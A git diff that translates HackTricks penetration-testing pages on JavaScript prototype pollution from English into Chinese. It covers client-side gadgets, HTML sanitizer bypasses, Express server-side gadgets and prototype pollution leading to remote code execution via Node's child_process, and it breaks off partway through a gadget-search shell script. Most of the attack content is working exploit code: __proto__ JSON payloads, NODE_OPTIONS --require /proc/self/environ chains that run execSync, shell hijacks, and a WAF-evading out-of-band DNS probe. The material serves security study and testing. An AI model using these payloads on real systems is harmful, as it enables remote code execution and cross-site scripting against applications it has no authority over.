+## 查找脚本小工具
 
-The gadget is the **code that will be abused once a PP vulnerability is discovered**.
+小工具是 **一旦发现 PP 漏洞将被滥用的代码**。
 
-If the application is simple, we can **search** for **keywords** like **`srcdoc/innerHTML/iframe/createElement`** and review the source code and check if it l**eads to javascript execution**. Sometimes, mentioned techniques might not find gadgets at all. In that case, pure source code review reveals some nice gadgets like the below example.
+如果应用程序很简单，我们可以 **搜索** **关键词**，如 **`srcdoc/innerHTML/iframe/createElement`** 并查看源代码，检查是否 **导致 JavaScript 执行**。有时，提到的技术可能根本找不到小工具。在这种情况下，纯源代码审查会揭示一些不错的小工具，如下面的示例。
 
-### Example Finding PP gadget in Mithil library code
+### 示例 在 Mithil 库代码中找到 PP 小工具
 
-Check this writeup: [https://blog.huli.tw/2022/05/02/en/intigriti-revenge-challenge-author-writeup/](https://blog.huli.tw/2022/05/02/en/intigriti-revenge-challenge-author-writeup/)
+查看此写作: [https://blog.huli.tw/2022/05/02/en/intigriti-revenge-challenge-author-writeup/](https://blog.huli.tw/2022/05/02/en/intigriti-revenge-challenge-author-writeup/)
 
-## Recompilation of payloads for vulnerable libraries
+## 针对易受攻击库的有效负载重新编译
 
 - [https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#prototype-pollution](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#prototype-pollution)
 - [https://github.com/BlackFan/client-side-prototype-pollution](https://github.com/BlackFan/client-side-prototype-pollution)
 
-## HTML Sanitizers bypass via PP
+## 通过 PP 绕过 HTML 清理器
 
-[**This research**](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) shows PP gadgets to use to **bypass the sanizations** provided by some HTML sanitizers libraries:
+[**这项研究**](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) 显示了用于 **绕过某些 HTML 清理器库提供的清理** 的 PP 小工具：
 
 - **sanitize-html**
 
@@ -84,34 +80,31 @@ Check this writeup: [https://blog.huli.tw/2022/05/02/en/intigriti-revenge-challe
 <figure><img src="../../../images/image (1141).png" alt="https://research.securitum.com/wp-content/uploads/sites/2/2020/08/image-9.png"><figcaption></figcaption></figure>
 
 - **Closure**
-
 ```html
 <!-- from https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/ -->
 <script>
-  Object.prototype['* ONERROR'] = 1;
-  Object.prototype['* SRC'] = 1;
+Object.prototype['* ONERROR'] = 1;
+Object.prototype['* SRC'] = 1;
 </script>
 <script src=https://google.github.io/closure-library/source/closure/goog/base.js></script>
 <script>
-  goog.require('goog.html.sanitizer.HtmlSanitizer');
-  goog.require('goog.dom');
+goog.require('goog.html.sanitizer.HtmlSanitizer');
+goog.require('goog.dom');
 </script>
 <body>
 <script>
-  const html = '<img src onerror=alert(1)>';
-  const sanitizer = new goog.html.sanitizer.HtmlSanitizer();
-  const sanitized = sanitizer.sanitize(html);
-  const node = goog.dom.safeHtmlToNode(sanitized);
+const html = '<img src onerror=alert(1)>';
+const sanitizer = new goog.html.sanitizer.HtmlSanitizer();
+const sanitized = sanitizer.sanitize(html);
+const node = goog.dom.safeHtmlToNode(sanitized);
 
-  document.body.append(node);
+document.body.append(node);
 </script>
 ```
-
-## References
+## 参考文献
 
 - [https://infosecwriteups.com/hunting-for-prototype-pollution-and-its-vulnerable-code-on-js-libraries-5bab2d6dc746](https://infosecwriteups.com/hunting-for-prototype-pollution-and-its-vulnerable-code-on-js-libraries-5bab2d6dc746)
 - [https://blog.s1r1us.ninja/research/PP](https://blog.s1r1us.ninja/research/PP)
 - [https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/#:\~:text=my%20challenge.-,Closure,-Closure%20Sanitizer%20has](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
index bb7cadbc0..c9d673e30 100644
--- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
+++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
@@ -1,69 +1,56 @@
-# Express Prototype Pollution Gadgets
+# Express 原型污染工具
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Serve XSS responses
+## 提供 XSS 响应
 
-**For further details** [**take a look to the original reserach**](https://portswigger.net/research/server-side-prototype-pollution)
+**有关更多详细信息** [**请查看原始研究**](https://portswigger.net/research/server-side-prototype-pollution)
 
-### Change JSON content-type to HTML
-
-In an Express app using a **JSON content type response** and reflecting a JSON:
+### 将 JSON 内容类型更改为 HTML
 
+在使用 **JSON 内容类型响应** 的 Express 应用中，反射一个 JSON：
 ```javascript
 app.use(bodyParser.json({ type: "application/json" }))
 app.post("/", function (req, res) {
-  _.merge({}, req.body)
-  res.send(req.body)
+_.merge({}, req.body)
+res.send(req.body)
 })
 ```
-
-In these cases XSS isn't normally possible with a JSON content type. However, with prototype pollution we can **confuse Express to serve up an HTML response.** This vulnerability relies on the application using **`res.send(obj)`** and using the body parser with the application/json content type.
-
+在这些情况下，XSS 通常不可能与 JSON 内容类型一起使用。然而，通过原型污染，我们可以 **混淆 Express 以提供 HTML 响应。** 这个漏洞依赖于应用程序使用 **`res.send(obj)`** 并使用应用程序/json 内容类型的主体解析器。
 ```json
 { "__proto__": { "_body": true, "body": "<script>evil()" } }
 ```
+通过**污染** **`body`** 和 **`_body`** 属性，可以导致 **Express 提供 HTML 内容类型** 并反射 `_body` 属性，从而导致存储型 XSS。
 
-By **polluting** **`body`** and **`_body`** properties, it's possible to cause **Express to serve up the HTML content type** and reflect the `_body` property, resulting in stored XSS.
-
-### Render UTF7
-
-It's possible to make express **render UTF-7 content with**:
+### 渲染 UTF7
 
+可以使 express **渲染 UTF-7 内容**：
 ```json
 { "__proto__": { "content-type": "application/json; charset=utf-7" } }
 ```
+## 安全扫描技术
 
-## Safe Scanning Techinques
-
-### JSON spaces
-
-The following PP will make attributes inside a JSON to have an extra space which won't break the functionality:
+### JSON 空格
 
+以下 PP 将使 JSON 内的属性具有额外的空格，这不会破坏功能：
 ```json
 { "__proto__": { "json spaces": " " } }
 ```
-
-Then a reflected JSON will looks like:
-
+然后反射的 JSON 看起来像：
 ```json
 {"foo":  "bar"} -- Note the extra space
 ```
+### 暴露的头部
 
-### Exposed Headers
-
-The following PP gadget will make the server send back the HTTP header: **`Access-Control-Expose_headers: foo`**
-
+以下 PP 小工具将使服务器返回 HTTP 头部：**`Access-Control-Expose_headers: foo`**
 ```json
 { "__proto__": { "exposedHeaders": ["foo"] } }
 ```
+它需要安装 **CORS 模块**
 
-It requires the **CORS module to be installed**
-
-### **OPTIONS Method**
-
-With the following payload, it's possible to **hide a method from an OPTIONS response**:
+### **OPTIONS 方法**
 
+使用以下有效载荷，可以 **从 OPTIONS 响应中隐藏一个方法**：
 ```javascript
 // Original reponse: POST,GET,HEAD
 
@@ -72,57 +59,45 @@ With the following payload, it's possible to **hide a method from an OPTIONS res
 
 //New response: POST;GET
 ```
+### **状态**
 
-### **Status**
-
-It's possible to change the **returned status code** using the following PP payload:
-
+可以使用以下 PP 有效负载更改 **返回状态代码**：
 ```json
 { "__proto__": { "status": 510 } }
 ```
+### 错误
 
-### Error
-
-When you assign to a prototype with a primitive such as a string, it produces a **no-op operation since the prototype has to be an object**. If you attempt to assign a prototype object to the `Object.prototype` itself, this will **throw an exception**. We can use these two behaviours to **detect if prototype pollution was successful**:
-
+当你用一个原始值（如字符串）赋值给原型时，它会产生一个 **无操作，因为原型必须是一个对象**。如果你尝试将一个原型对象赋值给 `Object.prototype` 本身，这将 **抛出一个异常**。我们可以利用这两种行为来 **检测原型污染是否成功**：
 ```javascript
 ;({}).__proto__.__proto__ = {}(
-  //throws type exception
-  {}
+//throws type exception
+{}
 ).__proto__.__proto__ = "x" //no-op does not throw exception
 ```
+### 反射值
 
-### Reflected Value
-
-When an application includes an object in its response, creating an attribute with an **unusual name alongside `__proto__`** can be insightful. Specifically, if **only the unusual attribute is returned** in the response, this could indicate the application's vulnerability:
-
+当一个应用程序在其响应中包含一个对象时，创建一个带有 **不寻常名称的属性以及 `__proto__`** 可能会很有启发性。具体来说，如果 **仅返回不寻常的属性** 在响应中，这可能表明应用程序的漏洞：
 ```json
 { "unusualName": "value", "__proto__": "test" }
 ```
-
-Moreover, in scenarios where a library like Lodash is employed, setting a property both via prototype pollution (PP) and directly inside the object offers another diagnostic approach. If such a property is omitted from the response, it suggests that Lodash is verifying the existence of the property in the target object before merging:
-
+此外，在使用像 Lodash 这样的库的场景中，通过原型污染 (PP) 和直接在对象内部设置属性提供了另一种诊断方法。如果这样的属性在响应中被省略，这表明 Lodash 在合并之前正在验证目标对象中属性的存在性：
 ```javascript
 {"__proto__":{"a":"value1"},"a":"value2","b":"value3"}
 // If 'b' is the only property reflected, this indicates prototype pollution in Lodash
 ```
-
 ## Misc
 
-### Allow Dots
-
-There is an option in Express that allows you to **create objects from query string parameters**.\
-You could definitely use it in a bug **chain** to exploit a **prototype pollution vulnerability**.
+### 允许点
 
+在 Express 中有一个选项，可以让你 **从查询字符串参数创建对象**。\
+你可以在一个漏洞 **链** 中使用它来利用 **原型污染漏洞**。
 ```json
 { "__proto__": { "allowDots": true } }
 ```
+**`?foo.bar=baz` 在 Node 中创建一个对象。**
 
-**`?foo.bar=baz` create an object in Node.**
-
-## References
+## 参考
 
 - [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md
index 2af001bd1..6e96fc231 100644
--- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md
+++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md
@@ -1,33 +1,32 @@
-# Prototype Pollution to RCE
+# 原型污染到 RCE
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Vulnerable Code
-
-Imagine a real JS using some code like the following one:
+## 易受攻击的代码
 
+想象一下一个真实的 JS 使用以下代码：
 ```javascript
 const { execSync, fork } = require("child_process")
 
 function isObject(obj) {
-  console.log(typeof obj)
-  return typeof obj === "function" || typeof obj === "object"
+console.log(typeof obj)
+return typeof obj === "function" || typeof obj === "object"
 }
 
 // Function vulnerable to prototype pollution
 function merge(target, source) {
-  for (let key in source) {
-    if (isObject(target[key]) && isObject(source[key])) {
-      merge(target[key], source[key])
-    } else {
-      target[key] = source[key]
-    }
-  }
-  return target
+for (let key in source) {
+if (isObject(target[key]) && isObject(source[key])) {
+merge(target[key], source[key])
+} else {
+target[key] = source[key]
+}
+}
+return target
 }
 
 function clone(target) {
-  return merge({}, target)
+return merge({}, target)
 }
 
 // Run prototype pollution with user input
@@ -38,13 +37,11 @@ clone(USERINPUT)
 // Create an a_file.js file in the current dir: `echo a=2 > a_file.js`
 var proc = fork("a_file.js")
 ```
+## PP2RCE 通过环境变量
 
-## PP2RCE via env vars
-
-**PP2RCE** means **Prototype Pollution to RCE** (Remote Code Execution).
-
-According to this [**writeup**](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/) when a **process is spawned** with some method from **`child_process`** (like `fork` or `spawn` or others) it calls the method `normalizeSpawnArguments` which a **prototype pollution gadget to create new env vars**:
+**PP2RCE** 意味着 **原型污染到 RCE**（远程代码执行）。
 
+根据这个 [**writeup**](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/)，当一个 **进程被生成** 时，使用 **`child_process`** 中的某些方法（如 `fork` 或 `spawn` 或其他）会调用方法 `normalizeSpawnArguments`，这是一个 **原型污染工具，用于创建新的环境变量**：
 ```javascript
 //See code in https://github.com/nodejs/node/blob/02aa8c22c26220e16616a88370d111c0229efe5e/lib/child_process.js#L638-L686
 
@@ -54,36 +51,34 @@ var envPairs = [];
 let envKeys = [];
 // Prototype values are intentionally included.
 for (const key in env) {
-  ArrayPrototypePush(envKeys, key);
+ArrayPrototypePush(envKeys, key);
 }
 [...]
 for (const key of envKeys) {
-  const value = env[key];
-  if (value !== undefined) {
-    ArrayPrototypePush(envPairs, `${key}=${value}`); // <-- Pollution
-  }
+const value = env[key];
+if (value !== undefined) {
+ArrayPrototypePush(envPairs, `${key}=${value}`); // <-- Pollution
+}
 }
 ```
+检查代码，你可以看到通过**污染**属性**`.env`**可以**毒害 `envPairs`**。
 
-Check that code you can see it's possible en **poison `envPairs`** just by **polluting** the **attribute `.env`.**
-
-### **Poisoning `__proto__`**
+### **毒害 `__proto__`**
 
 > [!WARNING]
-> Note that due to how the **`normalizeSpawnArguments`** function from the **`child_process`** library of node works, when something is called in order to **set a new env variable** for the process you just need to **pollute anything**.\
-> For example, if you do `__proto__.avar="valuevar"` the process will be spawned with a var called `avar` with value `valuevar`.
+> 请注意，由于**`child_process`**库中的**`normalizeSpawnArguments`**函数的工作方式，当调用某个函数以**设置新的环境变量**时，你只需要**污染任何东西**。\
+> 例如，如果你执行`__proto__.avar="valuevar"`，进程将以名为`avar`且值为`valuevar`的变量启动。
 >
-> However, in order for the **env variable to be the first one** you need to **pollute** the **`.env` attribute** and (only in some methods) that var will be the **first one** (allowing the attack).
+> 然而，为了使**环境变量成为第一个**，你需要**污染****`.env`属性**，并且（仅在某些方法中）该变量将是**第一个**（允许攻击）。
 >
-> That's why **`NODE_OPTIONS`** is **not inside `.env`** in the following attack.
-
+> 这就是为什么在以下攻击中**`NODE_OPTIONS`**不在**`.env`**中的原因。
 ```javascript
 const { execSync, fork } = require("child_process")
 
 // Manual Pollution
 b = {}
 b.__proto__.env = {
-  EVIL: "console.log(require('child_process').execSync('touch /tmp/pp2rce').toString())//",
+EVIL: "console.log(require('child_process').execSync('touch /tmp/pp2rce').toString())//",
 }
 b.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
 
@@ -93,7 +88,7 @@ var proc = fork("./a_file.js")
 
 // Abusing the vulnerable code
 USERINPUT = JSON.parse(
-  '{"__proto__": {"NODE_OPTIONS": "--require /proc/self/environ", "env": { "EVIL":"console.log(require(\\"child_process\\").execSync(\\"touch /tmp/pp2rce\\").toString())//"}}}'
+'{"__proto__": {"NODE_OPTIONS": "--require /proc/self/environ", "env": { "EVIL":"console.log(require(\\"child_process\\").execSync(\\"touch /tmp/pp2rce\\").toString())//"}}}'
 )
 
 clone(USERINPUT)
@@ -101,16 +96,14 @@ clone(USERINPUT)
 var proc = fork("a_file.js")
 // This should create the file /tmp/pp2rec
 ```
-
-### Poisoning `constructor.prototype`
-
+### 污染 `constructor.prototype`
 ```javascript
 const { execSync, fork } = require("child_process")
 
 // Manual Pollution
 b = {}
 b.constructor.prototype.env = {
-  EVIL: "console.log(require('child_process').execSync('touch /tmp/pp2rce2').toString())//",
+EVIL: "console.log(require('child_process').execSync('touch /tmp/pp2rce2').toString())//",
 }
 b.constructor.prototype.NODE_OPTIONS = "--require /proc/self/environ"
 
@@ -119,7 +112,7 @@ proc = fork("a_file.js")
 
 // Abusing the vulnerable code
 USERINPUT = JSON.parse(
-  '{"constructor": {"prototype": {"NODE_OPTIONS": "--require /proc/self/environ", "env": { "EVIL":"console.log(require(\\"child_process\\").execSync(\\"touch /tmp/pp2rce2\\").toString())//"}}}}'
+'{"constructor": {"prototype": {"NODE_OPTIONS": "--require /proc/self/environ", "env": { "EVIL":"console.log(require(\\"child_process\\").execSync(\\"touch /tmp/pp2rce2\\").toString())//"}}}}'
 )
 
 clone(USERINPUT)
@@ -127,21 +120,19 @@ clone(USERINPUT)
 var proc = fork("a_file.js")
 // This should create the file /tmp/pp2rec2
 ```
+## PP2RCE 通过环境变量 + 命令行
 
-## PP2RCE via env vars + cmdline
-
-A similar payload to the previous one with some changes was proposed in [**this writeup**](https://blog.sonarsource.com/blitzjs-prototype-pollution/)**.** The main differences are:
-
-- Instead of storing the nodejs **payload** inside the file `/proc/self/environ`, it stores it i**nside argv0** of **`/proc/self/cmdline`**.
-- Then, instead of requiring via **`NODE_OPTIONS`** the file `/proc/self/environ`, it **requires `/proc/self/cmdline`**.
+一个与之前类似的有效载荷经过一些更改后在 [**这篇文章**](https://blog.sonarsource.com/blitzjs-prototype-pollution/)**中提出**。主要区别如下：
 
+- 它不是将 nodejs **有效载荷** 存储在文件 `/proc/self/environ` 中，而是存储在 **`/proc/self/cmdline`** 的 **argv0** 中。
+- 然后，它不是通过 **`NODE_OPTIONS`** 要求文件 `/proc/self/environ`，而是 **要求 `/proc/self/cmdline`**。
 ```javascript
 const { execSync, fork } = require("child_process")
 
 // Manual Pollution
 b = {}
 b.__proto__.argv0 =
-  "console.log(require('child_process').execSync('touch /tmp/pp2rce2').toString())//"
+"console.log(require('child_process').execSync('touch /tmp/pp2rce2').toString())//"
 b.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
 
 // Trigger gadget
@@ -150,7 +141,7 @@ var proc = fork("./a_file.js")
 
 // Abusing the vulnerable code
 USERINPUT = JSON.parse(
-  '{"__proto__": {"NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\"child_process\\").execSync(\\"touch /tmp/pp2rce2\\").toString())//"}}'
+'{"__proto__": {"NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\"child_process\\").execSync(\\"touch /tmp/pp2rce2\\").toString())//"}}'
 )
 
 clone(USERINPUT)
@@ -158,41 +149,35 @@ clone(USERINPUT)
 var proc = fork("a_file.js")
 // This should create the file /tmp/pp2rec
 ```
+## DNS 交互
 
-## DNS Interaction
-
-Using the following payloads it's possible to abuse the NODE_OPTIONS env var we have discussed previously and detect if it worked with a DNS interaction:
-
+使用以下有效负载，可以滥用我们之前讨论过的 NODE_OPTIONS 环境变量，并通过 DNS 交互检测其是否有效：
 ```json
 {
-  "__proto__": {
-    "argv0": "node",
-    "shell": "node",
-    "NODE_OPTIONS": "--inspect=id.oastify.com"
-  }
+"__proto__": {
+"argv0": "node",
+"shell": "node",
+"NODE_OPTIONS": "--inspect=id.oastify.com"
+}
 }
 ```
-
-Or, to avoid WAFs asking for the domain:
-
+或者，为了避免 WAF 询问域名：
 ```json
 {
-  "__proto__": {
-    "argv0": "node",
-    "shell": "node",
-    "NODE_OPTIONS": "--inspect=id\"\".oastify\"\".com"
-  }
+"__proto__": {
+"argv0": "node",
+"shell": "node",
+"NODE_OPTIONS": "--inspect=id\"\".oastify\"\".com"
+}
 }
 ```
+## PP2RCE 漏洞 child_process 函数
 
-## PP2RCE vuln child_process functions
-
-In this section where are going to analyse **each function from `child_process`** to execute code and see if we can use any technique to force that function to execute code:
+在本节中，我们将分析 **`child_process` 中的每个函数** 以执行代码，并查看我们是否可以使用任何技术强制该函数执行代码：
 
 <details>
 
-<summary><code>exec</code> exploitation</summary>
-
+<summary><code>exec</code> 利用</summary>
 ```javascript
 // environ trick - not working
 // It's not possible to pollute the .env attr to create a first env var
@@ -204,7 +189,7 @@ const { exec } = require("child_process")
 p = {}
 p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
 p.__proto__.argv0 =
-  "console.log(require('child_process').execSync('touch /tmp/exec-cmdline').toString())//"
+"console.log(require('child_process').execSync('touch /tmp/exec-cmdline').toString())//"
 p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
 var proc = exec("something")
 
@@ -218,13 +203,11 @@ p = {}
 p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
 var proc = exec("something")
 ```
-
 </details>
 
 <details>
 
-<summary><strong><code>execFile</code> exploitation</strong></summary>
-
+<summary><strong><code>execFile</code> 利用</strong></summary>
 ```javascript
 // environ trick - not working
 // It's not possible to pollute the .en attr to create a first env var
@@ -235,7 +218,7 @@ const { execFile } = require("child_process")
 p = {}
 p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
 p.__proto__.argv0 =
-  "console.log(require('child_process').execSync('touch /tmp/execFile-cmdline').toString())//"
+"console.log(require('child_process').execSync('touch /tmp/execFile-cmdline').toString())//"
 p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
 var proc = execFile("/usr/bin/node")
 
@@ -244,25 +227,23 @@ var proc = execFile("/usr/bin/node")
 
 // Windows - not working
 ```
+为了使 **`execFile`** 工作，它 **必须执行 node** 才能使 NODE_OPTIONS 生效。\
+如果它 **没有** 执行 **node**，你需要找到如何 **通过环境变量** **更改执行** 的内容并设置它们。
 
-For **`execFile`** to work it **MUST execute node** for the NODE_OPTIONS to work.\
-If it's **not** executing **node**, you need to find how you could **alter the execution** of whatever it's executing **with environment variables** and set them.
-
-The **other** techniques **work** without this requirement because it's **possible to modify** **what is executed** via prototype pollution. (In this case, even if you can pollute `.shell`, you won't pollute that is being executed).
+**其他** 技术 **在** 没有此要求的情况下 **工作**，因为 **可以通过** 原型污染 **修改** **被执行的内容**。 （在这种情况下，即使你可以污染 `.shell`，你也不会污染正在执行的内容）。
 
 </details>
 
 <details>
 
-<summary><code>fork</code> exploitation</summary>
-
+<summary><code>fork</code> 利用</summary>
 ```javascript
 // environ trick - working
 // Working after kEmptyObject (fix)
 const { fork } = require("child_process")
 b = {}
 b.__proto__.env = {
-  EVIL: "console.log(require('child_process').execSync('touch /tmp/fork-environ').toString())//",
+EVIL: "console.log(require('child_process').execSync('touch /tmp/fork-environ').toString())//",
 }
 b.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
 var proc = fork("something")
@@ -272,7 +253,7 @@ var proc = fork("something")
 const { fork } = require("child_process")
 p = {}
 p.__proto__.argv0 =
-  "console.log(require('child_process').execSync('touch /tmp/fork-cmdline').toString())//"
+"console.log(require('child_process').execSync('touch /tmp/fork-cmdline').toString())//"
 p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
 var proc = fork("something")
 
@@ -296,13 +277,11 @@ b = {}
 b.__proto__.execPath = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
 var proc = fork("./a_file.js")
 ```
-
 </details>
 
 <details>
 
-<summary><strong><code>spawn</code> exploitation</strong></summary>
-
+<summary><strong><code>spawn</code> 利用</strong></summary>
 ```javascript
 // environ trick - working with small variation (shell and argv0)
 // NOT working after kEmptyObject (fix) without options
@@ -312,7 +291,7 @@ p = {}
 p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed
 p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
 p.__proto__.env = {
-  EVIL: "console.log(require('child_process').execSync('touch /tmp/spawn-environ').toString())//",
+EVIL: "console.log(require('child_process').execSync('touch /tmp/spawn-environ').toString())//",
 }
 p.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
 var proc = spawn("something")
@@ -324,7 +303,7 @@ const { spawn } = require("child_process")
 p = {}
 p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
 p.__proto__.argv0 =
-  "console.log(require('child_process').execSync('touch /tmp/spawn-cmdline').toString())//"
+"console.log(require('child_process').execSync('touch /tmp/spawn-cmdline').toString())//"
 p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
 var proc = spawn("something")
 //var proc = spawn('something',[],{"cwd":"/tmp"}); //To work after kEmptyObject (fix)
@@ -340,13 +319,11 @@ p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
 var proc = spawn("something")
 //var proc = spawn('something',[],{"cwd":"C:\\"}); //To work after kEmptyObject (fix)
 ```
-
 </details>
 
 <details>
 
-<summary><strong><code>execFileSync</code> exploitation</strong></summary>
-
+<summary><strong><code>execFileSync</code> 利用</strong></summary>
 ```javascript
 // environ trick - working with small variation (shell and argv0)
 // Working after kEmptyObject (fix)
@@ -356,7 +333,7 @@ p = {}
 p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed
 p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
 p.__proto__.env = {
-  EVIL: "console.log(require('child_process').execSync('touch /tmp/execFileSync-environ').toString())//",
+EVIL: "console.log(require('child_process').execSync('touch /tmp/execFileSync-environ').toString())//",
 }
 p.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
 var proc = execFileSync("something")
@@ -367,7 +344,7 @@ const { execFileSync } = require("child_process")
 p = {}
 p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
 p.__proto__.argv0 =
-  "console.log(require('child_process').execSync('touch /tmp/execFileSync-cmdline').toString())//"
+"console.log(require('child_process').execSync('touch /tmp/execFileSync-cmdline').toString())//"
 p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
 var proc = execFileSync("something")
 
@@ -388,13 +365,11 @@ p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
 p.__proto__.argv0 = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
 var proc = execSync("something")
 ```
-
 </details>
 
 <details>
 
-<summary><strong><code>execSync</code> exploitation</strong></summary>
-
+<summary><strong><code>execSync</code> 利用</strong></summary>
 ```javascript
 // environ trick - working with small variation (shell and argv0)
 // Working after kEmptyObject (fix)
@@ -404,7 +379,7 @@ p = {}
 p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed
 p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
 p.__proto__.env = {
-  EVIL: "console.log(require('child_process').execSync('touch /tmp/execSync-environ').toString())//",
+EVIL: "console.log(require('child_process').execSync('touch /tmp/execSync-environ').toString())//",
 }
 p.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
 var proc = execSync("something")
@@ -415,7 +390,7 @@ const { execSync } = require("child_process")
 p = {}
 p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
 p.__proto__.argv0 =
-  "console.log(require('child_process').execSync('touch /tmp/execSync-cmdline').toString())//"
+"console.log(require('child_process').execSync('touch /tmp/execSync-cmdline').toString())//"
 p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
 var proc = execSync("something")
 
@@ -435,13 +410,11 @@ p = {}
 p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
 var proc = execSync("something")
 ```
-
 </details>
 
 <details>
 
-<summary><strong><code>spawnSync</code> exploitation</strong></summary>
-
+<summary><strong><code>spawnSync</code> 利用</strong></summary>
 ```javascript
 // environ trick - working with small variation (shell and argv0)
 // NOT working after kEmptyObject (fix) without options
@@ -451,7 +424,7 @@ p = {}
 p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed
 p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
 p.__proto__.env = {
-  EVIL: "console.log(require('child_process').execSync('touch /tmp/spawnSync-environ').toString())//",
+EVIL: "console.log(require('child_process').execSync('touch /tmp/spawnSync-environ').toString())//",
 }
 p.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
 var proc = spawnSync("something")
@@ -463,7 +436,7 @@ const { spawnSync } = require("child_process")
 p = {}
 p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
 p.__proto__.argv0 =
-  "console.log(require('child_process').execSync('touch /tmp/spawnSync-cmdline').toString())//"
+"console.log(require('child_process').execSync('touch /tmp/spawnSync-cmdline').toString())//"
 p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
 var proc = spawnSync("something")
 //var proc = spawnSync('something',[],{"cwd":"/tmp"}); //To work after kEmptyObject (fix)
@@ -486,34 +459,31 @@ p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
 var proc = spawnSync("something")
 //var proc = spawnSync('something',[],{"cwd":"C:\\"}); //To work after kEmptyObject (fix)
 ```
-
 </details>
 
-## Forcing Spawn
+## 强制生成
 
-In the previous examples you saw how to trigger the gadget a functionality that **calls `spawn`** needs to be **present** (all methods of **`child_process`** used to execute something calls it). In the previous example that was **part of the the code**, but what if the code **isn't** calling it.
+在之前的示例中，您看到如何触发小工具，功能需要**调用 `spawn`**的功能**存在**（所有用于执行某些操作的**`child_process`**方法都会调用它）。在之前的示例中，这是**代码的一部分**，但如果代码**没有**调用它呢？
 
-### Controlling a require file path
+### 控制 require 文件路径
 
-In this [**other writeup**](https://blog.sonarsource.com/blitzjs-prototype-pollution/) the user can control the file path were a **`require`** will be executed. In that scenario the attacker just needs to **find a `.js` file inside the system** that will **execute a spawn method when imported.**\
-Some examples of common files calling a spawn function when imported are:
+在这个 [**其他写作**](https://blog.sonarsource.com/blitzjs-prototype-pollution/) 中，用户可以控制将执行**`require`**的文件路径。在这种情况下，攻击者只需**找到系统中的一个 `.js` 文件**，该文件在导入时会**执行一个 spawn 方法。**\
+一些常见的在导入时调用 spawn 函数的文件示例包括：
 
 - /path/to/npm/scripts/changelog.js
 - /opt/yarn-v1.22.19/preinstall.js
-- Find **more files below**
-
-The following simple script will search for **calls** from **child_process** **without any padding** (to avoid showing calls inside functions):
+- 在下面**找到更多文件**
 
+以下简单脚本将搜索**来自**`child_process`**的调用**，**没有任何填充**（以避免显示函数内部的调用）：
 ```bash
 find / -name "*.js" -type f -exec grep -l "child_process" {} \; 2>/dev/null | while read file_path; do
-    grep --with-filename -nE "^[a-zA-Z].*(exec\(|execFile\(|fork\(|spawn\(|execFileSync\(|execSync\(|spawnSync\()" "$file_path" | grep -v "require(" | grep -v "function " | grep -v "util.deprecate" | sed -E 's/.{255,}.*//'
